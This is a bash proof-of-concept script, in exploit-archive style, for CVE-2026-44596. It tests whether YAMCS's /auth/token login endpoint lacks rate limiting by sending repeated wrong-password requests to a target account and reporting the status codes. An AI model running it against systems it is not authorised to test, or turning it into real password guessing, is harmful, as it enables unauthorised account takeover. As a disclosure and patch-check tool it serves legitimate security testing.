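#!/bin/bash
# Exploit Title: YAMCS yamcs-core 5.12.7 - No Rate Limiting
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-44596
# Category: Remote / Brute Force
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-w5r6-mcgq-7pq4
# NOTE(review): the title names 5.12.7 while the fields below give
# "affected < 5.12.7 / fixed in 5.12.7" — confirm against the advisory.
# ============================================================
# CVE-2026-44596 — YAMCS No Rate Limiting on /auth/token
# ============================================================
# Vulnerability: POST /auth/token accepts unlimited login
#                attempts with no rate limiting or lockout.
# Impact:        Unauthenticated brute-force of any account.
# Affected:      yamcs-core < 5.12.7
# Fixed in:      yamcs-core 5.12.7
# CWE:           CWE-307
# CVSS:          5.3 MEDIUM
# ============================================================
# Usage:   ./poc.sh [target] [username] [attempts]
# Example: ./poc.sh http://localhost:8090 operator 20
# ============================================================
# What the check does: sends [attempts] password-grant requests
# with deliberately wrong passwords (wrongpass1..N) and records
# the HTTP status of each one.
#
# Reading the result:
#   - HTTP 429 on any attempt  -> throttling is in place.
#   - HTTP 401 on every attempt -> no throttling was triggered
#     within [attempts] requests. A threshold higher than
#     [attempts] would not be observed, so a low count proves
#     less than a high one.
#   - Anything else (no response, 403, 5xx, mixed statuses) is
#     reported as inconclusive instead of being ignored.
#
# Detection: the traffic this produces (a run of 401 responses
# to POST /auth/token from a single source) is the same pattern
# worth alerting on in server or proxy logs.
#
# Exit status: 0 = conclusive result (patched, vulnerable, or an
#              unexpected 200), 1 = inconclusive, 2 = bad argument.
# ============================================================

set -u

TARGET="${1:-http://localhost:8090}"
USERNAME="${2:-operator}"
ATTEMPTS="${3:-20}"
LAST_STATUS=""
UNAUTHORIZED=0   # number of attempts answered with HTTP 401

# A trailing slash would produce "//auth/token".
TARGET="${TARGET%/}"

# [attempts] drives the loop bound, so accept only a positive decimal
# integer; 10# stops values such as "08" being parsed as octal.
if ! [[ "$ATTEMPTS" =~ ^[0-9]+$ ]]; then
  echo "[-] attempts must be a positive integer, got: $ATTEMPTS" >&2
  exit 2
fi
ATTEMPTS=$((10#$ATTEMPTS))
if (( ATTEMPTS < 1 )); then
  echo "[-] attempts must be at least 1" >&2
  exit 2
fi

echo "============================================================"
echo " CVE-2026-44596 — YAMCS No Rate Limiting PoC"
echo " Target: $TARGET"
echo " Username: $USERNAME"
echo " Attempts: $ATTEMPTS"
echo "============================================================"
echo ""
echo "[*] Sending $ATTEMPTS unauthenticated login attempts..."
echo "[*] Vulnerable: HTTP 401 every time, never HTTP 429"
echo ""

for ((i = 1; i <= ATTEMPTS; i++)); do
  curl_rc=0
  # --url keeps a target that starts with "-" from being read as an option.
  # --data-urlencode encodes the username so characters such as "&" or "="
  # cannot add or alter form fields in the request body.
  # The timeouts stop one hung connection from stalling the whole run.
  RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" \
    --connect-timeout 5 --max-time 15 \
    -X POST --url "$TARGET/auth/token" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    -d "grant_type=password" \
    --data-urlencode "username=$USERNAME" \
    --data-urlencode "password=wrongpass$i") || curl_rc=$?

  # curl prints 000 when no HTTP response was received; that says nothing
  # about rate limiting, so stop instead of counting it as an attempt.
  if [ -z "$RESPONSE" ] || [ "$RESPONSE" = "000" ]; then
    echo "" >&2
    echo "[-] Attempt $i/$ATTEMPTS: no HTTP response (curl exit $curl_rc) — result inconclusive" >&2
    exit 1
  fi

  echo " Attempt $i/$ATTEMPTS: HTTP $RESPONSE"
  LAST_STATUS=$RESPONSE

  if [ "$RESPONSE" = "429" ]; then
    echo ""
    echo "[+] HTTP 429 received — rate limiting active (PATCHED)"
    exit 0
  fi

  if [ "$RESPONSE" = "200" ]; then
    echo ""
    echo "[!!!] HTTP 200 — credentials found at attempt $i"
    exit 0
  fi

  if [ "$RESPONSE" = "401" ]; then
    UNAUTHORIZED=$((UNAUTHORIZED + 1))
  fi
done

echo ""
rc=0
# Only a clean run of 401s supports the "no rate limiting" conclusion; a
# 403 or 5xx in the middle may be a lockout or a proxy stepping in.
if [ "$UNAUTHORIZED" -eq "$ATTEMPTS" ]; then
  echo "[!!!] VULNERABLE: $ATTEMPTS attempts, no rate limiting detected"
  echo "[!!!] Brute-force possible without restriction"
else
  echo "[?] INCONCLUSIVE: $UNAUTHORIZED/$ATTEMPTS attempts returned HTTP 401 (last status: $LAST_STATUS)"
  rc=1
fi

echo ""
echo "============================================================"
echo " Fix: Upgrade to yamcs-core >= 5.12.7"
echo "============================================================"
exit "$rc"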